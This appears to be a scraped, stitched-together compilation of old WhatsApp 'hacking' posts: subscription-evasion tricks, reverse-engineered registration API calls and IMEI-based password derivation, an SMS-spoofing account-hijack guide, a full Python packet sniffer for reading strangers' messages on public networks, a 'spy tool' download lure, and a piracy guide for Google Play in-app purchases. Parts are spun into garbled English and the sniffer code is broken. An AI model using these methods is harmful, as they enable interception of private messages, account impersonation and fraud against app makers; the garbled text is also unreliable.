Gadget needed :
A. Iphone / Ipad [Borrow your friend's phone  ]
B. Your own android phone

How to extend:
1. Register your Android WhatsApp phone number on WhatsApp for iPhone (doesn't need to change the sim card, just register the number).
2. Enter 3 digit SMS code sent to your sim card and enter it on WhatsApp for iPhone.
3. Re install whatsapp for Android, then register your number that already registered in iPhone and you will get 10 years license.
ENJOY GUYS..:)

I have heard that whatsapp is not encrypted ( its an app like viber) and that when you sign up for a number hte code is generated within your phone sent to whatssapp servers and then sent to you. because it is not encrpted you can intercept it from your phone I have been trying to figure it out for days saw many links, does anyone have any advice ? here are two posts I found on the internet that might help. They used to have this thing where all you had to do was put your phone in airplane mode and the activation code would be in your outbox not sent, but that wont work anymore.

A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school.
I used the Symbian S40 Client and decompiled the .jar you can find via google to look a little bit into it.
I'm not a programmer but had done some "Hello World" stuff on Java before so I tried to understand a little bit what is going on in the Client. (In the following work I always pretended to be an Nokia C3-00 just that you know when it appears i.e. in the User-Agent)


I don't know if it's helpful for you but I will try to share the things I found out by looking into the code even though I can't gurantee they are right:

The first thing is the login-Name and the password needed to login:
Matching with reports from some other threads here and in other forums the login name I found was some sort of:
Code:

international area code without the 0's or + in the beginning + phone number without the first 0 + @s.whatsapp.net

For example if you live in germany and having the phone number 017612345 it would be 4917612345@s.whatsapp.net -> 0049 for germany without the 0's and the phone number without the 0.

The Password is set during the registration process but usually it is an transformation of the IMEI of your phone (in case you don't want to stand out you should also do it like this). I must admit I don't exactly know how this transormation works but I have the code that does it.
I just wrapped it _very dirty_ in a standalone Java program to test it. source: http://pastebin.com/npbwcj1s
I really don't know what it exactly does and didn't look deeper into it but it isn't a "real" md5 I think... (Maybe someone who knows how to create an MD5 in Java can look at it what is different except the reverse of the imei?)


The second thing I searched for is the registration process.
With this I got so far that I got an Registration-Code and I also get the response from the Server that the account exists but I can't login because I hadn't enough time to look excatly at the login process. Just logging in via XAMPP in Pidgin doesn't work expectedly

The registration process works this way: (no gurantee that it is right and don't try it with your "real" number. I tried it with an old SIM I had lying around)

0) All these API-Request are done with an User-Agent like:
Code:

WhatsApp/2.1.0 S40Version/04.60 Device/nokiac3-00

The Code generating this is: http://pastebin.com/K79wrfnS
I used information I found in the web to fill the information for the Nokia C3-00.
As said by the pw: I don't think you really have to fake it to look like this but it maybe makes it harder to find you.

1) The first step ist requesting the Registration-code from the Server (the Code you get i.e. via SMS)

The API-call looks like this:
Code:

https://r.whatsapp.n...0000&method=sms

The Arguments are as following:
cc = area code without 0's
in = number without first 0
to = number where the sms or call should go to (maybe security weakness?)
lc/lg = Language-Code(?) splittet up - e.g. DE_de goes to lc=DE&lg=de US_en would be lc=US&lg=en
mcc/mnc/imsi = Should be the "Mobile Country Code", "Mobile Network Code" and the "Mobile Subscriber Identification Number"
-> I don't know how to get to them and the App has as "fallback" just the 0's in it when the system-request for them fails so it should work with the 0's (and it does)

The metod is maybe the most interesting thing.
There are 3 methods: self, sms and voice
When choosing sms you get the Code via SMS as you may know it, choosing voice you get a call at the to-number where it reads the code (I didn't test but it would match with informations you find at some other places in the web). I don't know what self exactly does and I didn't really looked for it because the SMS-Way seemed the best for me, especally because I just wanted to know my Code :>

The Answer after calling the API is an xml saying:
Code:

<code><response status="sucess-sent" result="30"></code>

What error-Messages look like I don't know because it worked for me (and I just looked into the code again and I didn't find any code that works with an specific error, it just closes the App when an error occurs if I'm right) ^^

Also you should get an sms (in case you used the method sms) at the "to" number conatining the WhatsApp-Code which looks like this:
Code:

WhatsApp code abc

abc is the necessary Code

2) With the given code you can then register your Whatsapp-Account

API-Call:
Code:

https://r.whatsapp.n...d=asdf&code=abc

cc/in = the same as in code.php
udid = the calculated password as explained in the login-data
code = the just recieved WhatsApp-Code

The XML response looks like:
Code:

<register> <response status="ok" login="4917612345" result="new" /> </register>

The login-value is your login-Name for the connection and built like explained.
I think that there are error-messages when the account already exists etc. but as said: I didn't have more time and It worked ^^

3) As third API-call you can check if an accounts exists. This isn't necessary for registration I think.

API-call:
Code:

https://r.whatsapp.n...12345&udid=asdf

Parameters are the same like above.

Resonse when account with this number and pw exists:
Code:

<exist><response status="ok" result="4917612345" /></exist>

The result again gives the login-name for this account.
I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given pw exisists. You can't check if another numer has an WhatsApp-Account with this API-call. (or I just was to stupid to find out how to do this)


The last thing I searced for before studing for my exams was the server connection.

It Baisicly is - as said everywhere - an XAMPP Connection. At least it looks like.
I think there are some small differences between the default XAMPP and the way WhatsApp does it.

But nevertheless the URL I found to where it tries to connect is:
Code:

socket://bin-short.whatsapp.net:5222

When connecting to the URL with Pidgin and default XAMPP it also gets an connection but the connection gets closed by the server after sending the xml and xampp information.
When I connected to a "default" XAMPP server after these two "sendings" the Client gets an response from the Server.
WhatsApp instead sends the Auth directly after the features so I think the Server quits the connection because Pidgin is waiting for Information and the Server also is waiting for information.

The Login-Process in the WhatsApp-Code looks like:
Code:

out.streamStart(connection.domain, connection.resource);
System.err.println("sent stream start");
sendFeatures();
System.err.println("sent features");
sendAuth();
System.err.println("sent auth");
in.streamStart();
System.err.println("read stream start");
String challengeData = readFeaturesAndChallenge();
System.err.println("read features and challenge");
sendResponse(challengeData);
System.err.println("sent response");
readSuccess();

Because WhatsApp uses a "default" XAMPP-Libary which is just modified and the default functions are still there I think the default Login-Process of XAMPP looks like:
Code:

send1();
send2DigestMD5Mechanism();
read1();
String challenge = read2Challenge();
send2SASLResponse(challenge);
send2UselessResponse();
read2Challenge();
read2();
send3();
read3();
send4();
send5();

-> as said, after the send1 and 2 (which are doing baisicly the same as the streamStart and sentFeatures in the WhatsApp-Version) it waits for information instead of sending the Auth.

Here I stopped working on it because of the exams. I think it should be not too difficult to make a login work when completely re-writing the Original functions.
Just as orientation the whole (sub)class of the WhatsApp-Login: http://pastebin.com/X8gv2XRU


Thats all I did up to now (or more exactly before my exams).
I would really like to see somebody working on this and making it work on the N900. At first I wanted to look at it again after the exams but eventhough I finished my exams two weeks ago I didn't found the time to work on this and because I'm not a programmer it also would take at least a _very_ long time to work, if it would work at all


If some beta-testers are searched for the programm I would really like to test it from a hobby-programmer or more non-programmer point of view



PS: Eventhough I personally don't like it when people ask for forgiveness for their bad english I would like to do the same right now
I'm from Germany and not really good in languages. I really hope my text ist readable and you understand what I wanted to say with it ^^ (if you don't understand something feel free to ask what it was meant to say )

and then I found this :

How to hack WhatsApp Messenger on Nokia, iPhone & Android

shareshareshareshare

WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.

In this article i will talk about alternative methods of hi-jacking WhatsApp messages and other protocols using a variety of methods.

The first hack im going to talk about will spoof WhatsApp and have it think you are somebody else allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.
Hack 1

Install WhatsApp on your device

WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.

WhatsApp now offers an alternative method of verification

Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.

Next we need to do some SMS-Spoofing

There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.
If you are using an iPhone use the following details in the SMS spoofer application.

To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)

If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.

You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.
Hack 2

The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications.

You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/

Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for.
Example
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

DYN:~/whatsapp# python sniffer.py wlan0

#########################
## whatsapp sniff v0.1 ##
#########################

[+] Interface : wlan0
[+] filter : tcp port 5222

To : ***********
Msg : Hello, I will send you a file.

To : **********
Filename : .jpg
URL : https://mms*.whatsap...3/*md5hash*.jpg

From : ***********
Msg : Thanks file has been recieved, take this file too.

From : ***********
Filename : .jpg
URL : https://mms*.whatsap...1/*md5hash*.jpg
Code

You can grab the code on the downloads page http://insanitypop.com/downloads/ or view it below:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117

#!/usr/bin/env python

import os
import sys
import scapy.all
import re

Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []

def banner():
print "#########################"
print "## whatsapp sniff v0.1 ##"
print "## qnix@0x80.org ##"
print "#########################\n"

def whatsapp_parse(packet):
global Previous_Msg
global Previous_Filename
global Files
global Messages
global Urls
src = packet.sprintf("%IP.src%")
dst = packet.sprintf("%IP.dst%")
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")

# Target Sending stuff
if dport == "5222":
Filename = ""
toNumber = ""
Url = ""
Msg = ""
try:
toNumber = re.sub("\D", "", raw)
if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
else: toNumber = toNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except:pass
try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except:pass
except: pass
if(len(toNumber) >= 10):
if(len(Msg) >= 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "To : ", toNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "To : ", toNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)

# Recieved Messages
if sport == "5222":
Msg = ""
fromNumber = ""
Url = ""
Filename = ""
try:
fromNumber = re.sub("\D", "", raw)
if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
else: fromNumber = fromNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except: pass
try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except: pass
except:pass
if(len(fromNumber) = 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "From : ", fromNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "From : ", fromNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
def callback(packet):
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
if raw != '??':
if dport == "5222" or sport == "5222":
whatsapp_parse(packet)

def main():
banner()
if(len(sys.argv) != 2):
print "%s " % sys.argv[0]
sys.exit(1)
scapy.iface = sys.argv[1]
scapy.verb = 0
scapy.promisc = 0
expr = "tcp port 5222"

print "[+] Interface : ", scapy.iface
print "[+] filter : ", expr
scapy.all.sniff(filter=expr, prn=callback, store=0)

print "[+] iface %s" % scapy.iface

if __name__ == "__main__":
main()

WATCH THIS AWESOME VIDEO ON WHATSAPP HACKING USING SPY TOOL

MANY OF YOU ARE NOT BEING ABLE TO SEE THIS VIDEO AS YOUTUBE TEAM HAVE DELETED THIS FROM THEIR SITE.
BUT YOU CAN STILL WATCH THIS AWESOME VIDEO AT BELOW LINK

VIDEO LINK

VIDEO HAS BEEN DELETED BY YOUTUBE. FOR THE SAME VIDEO CHECK ABOVE LINK.
DOWNLOAD SPY TOOL

 

https://r.whatsapp.net/v1/exist.php?
cc=$countrycode&in=$phonenumber&udid=$password

$countrycode = the country calling code
$phonenumber = the users phone number 
(without the country calling code)
$password = see above, for iPhone use md5($wlanMAC.$wlanMAC), 
for Android use md5(strrev($imei))

https://sro.whatsapp.net/client/iphone/iq.php
?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1
&u[]=$friend2&u[]=$friend3&u[]=$friend4

The server response looks like:

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">

<plist version="1.0">

<array>

<dict>

<key>P</key>

<string>1234567890</string>

<key>T</key>

<integer>10817</integer>

<key>S</key>

<string>Some Status Message</string>

<key>JID</key>

<string>23xxxxxxxxx</string>

<key>NP</key>

<true/>

</dict>

</array>

</plist>

While millions people are waiting for the end of the world Russian hacker Zond80 and Madkite launched Freedom app that could hack Google Play in-app purchase. Using Freedom app allows you to download Android apps extensions for free on any device running Android OS.
If you remember in late spring Zond80 already launched in-app purchase hack for App Store but in case with Google Play it was more difficult to perform. And now you can download Freedom app and feel real freedom on Google Play store.

Important note: I have to upset some Android users because not all of you can perform free in-app purchase using Google Play hack because this service is not available in United States, Canada, EU countries, Switzerland, Norway, Iceland, Liechtenstein, Australia and New Zealand.

To use Freedom Google Play in-app purchase hack from Zond80 and Madkite you need to perform three easy steps:

1. Download Freedom.
2. Install and run it on Android device.
3. Choose and tap on app which you wish to get for free.

Before we start it is important to read the note below taken from in-appstore.com zond80′s blog:

Remember: Freedom launcher was made only for legally installed applications. You can use this application to get content, already included in these apps. Please do not pirate Google Play apps.

If you agree with this requirement we can start.

How To Use Freedom App To Hack Google Play In-App Purchase

Step 1. First you need to download Freedom APK file.
Step 2. After downloading go to Security settings on your device and make sure that you enable “Unknown Sources”.
Step 3. Now just install Freedom app and open it allowing superuser permissions request.
Step 4. After successful installation go to Google Play and choose the app you want to download.
Step 5. Now just make free in-app purchase clicking Accept & Download. Wait till the app will finish to download.
Step 6. Run Freedom and tap on the app you have just downloaded.
Step 7. Now you can make your in-app purchase.

NOTE: We do not urge you to do so and didn’t promote this hack or hackers. We are independent source and give the information that could be interesting to you.
That’s it. Now you can make free in-app purchases in Google Play using Freedom app every time you want to do this. This hack doesn’t work for online in-app purchase. Only on your device where apps are already downloaded.

Whatsapp

Hope you people enjoyed it..

Source-http://www.itrickers.com

There have been rumors that Whatsapp for Android would become for payment. But, there are some rumors talking about alternatives to avoid paying for the annual subscription.
Whatsapp is sure actually the most popular instant messaging for smartphones. Normally we can find any smartphone user with this app installed. The strategy of the company has been to give Android users a free messaging app. In part this has been possible because the company behind the project has offered the service in test mode for over a year. However, the fact that many users, especially with Android, did not realize that a subscription is required is that the company has expanded gradually and individually this trial period until a few months ago.
Transition period paid subscription free
From that moment echoed some users that the application requesting them “renew” your subscription, something that has been confirmed officially Barely a few days. However, the short time that has served to detect some methods to continue enjoying free Whatsapp services.
Methods to make it:
* Let the trial period expire Whatsapp.
Thus, the company is forced to extend again the trial period (at least it seems there are Android users enjoying this option). It seems Whatsapp is preventing users to migrate out to other alternatives such as Spotbros, Line,… Therefore, once the servers detect the inactivity of a number associated with an account of Whatsapp expired, they proceed to restore the free trial period.
* Associate our phone number to Whatsapp application for iPhone
The most reliable method is to associate our phone number to Whatsapp application for iPhone (maybe not the best option but there is one of them). Thus, the account will enjoy the conditions of terminals arranged for Apple, which mainly goes through a lifetime subscription payment for the application. Later, after entering the SIM in another terminal, in this case an Android smartphone, the conditions remain unchanged to our phone number. This method requires access to an iPhone, which may involve more disorder than the annual payment itself Whatsapp service. Still, it is interesting for those who can do this. To understand why this method should indicate that Whatsapp was created initially for iPhone and service conditions specified that payment for the application involved the use of instant messaging network free for life.
However, I’m going to be honest. In my opinion there is no problem to pay less than one or two dollars to keep running correctly an Android app very useful for me.
Now it’s your choice.

Get Free Subscription of WhatsApp With Easy Steps-


Last months there are rumors that Whatsapp for Google Android would become for payment. But, there square measure some rumors talking concerning alternatives to avoid paying for the annual subscription.
Whatsapp is certain really the foremost fashionable instant electronic messaging for smartphones. ordinarily we will realize any smartphone user with this app put in. The strategy of the corporate has been to present humanoid users a free electronic messaging app. partially this has been potential as a result of the corporate behind the project has offered the service in check mode for over a year. However, the actual fact that several users, particularly with humanoid, didn’t notice that a subscription is needed is that the corporate has enlarged step by step and singly this period of time till a couple of months agone.
Transition amount paid subscription free
From that moment echoed some users that the appliance requesting them “renew” your subscription, one thing that has been confirmed formally Barely a couple of days. However, the short time that has served to sight some ways to continue enjoying free Whatsapp services.
Methods to create it:

• Let the period of time expire Whatsapp.

  Thus, the corporate is forced to increase once more the period of time (at least it appears there square measure humanoid users enjoying this option). It appears Whatsapp is preventing users to migrate resolute different alternatives like Spotbros, Line,… so, once the servers sight the inactivity of variety related to associate account of Whatsapp expired , they proceed to revive the free period of time.
  
  

• Associate our signaling to Whatsapp application for iPhone

  The most reliable technique is to associate our signaling to Whatsapp application for iPhone (maybe not the simplest possibility however there’s one among them). Thus, the account can get pleasure from the conditions of terminals organized for Apple, that principally goes through a period of time subscription payment for the appliance. Later, once coming into the SIM in another terminal, during this case associate humanoid smartphone, the conditions stay unchanged to our signaling. This technique needs access to associate iPhone, which can involve additional disorder than the annual payment itself Whatsapp service. Still, it’s fascinating for those that will do that. to grasp why this technique ought to indicate that Whatsapp was created at the start for iPhone and repair conditions specified  that payment for the appliance concerned the employment of instant electronic messaging network free always.
  
  

WATCH OUT THIS WHATSAPP SNIFFER HACK
[IN GERMAN]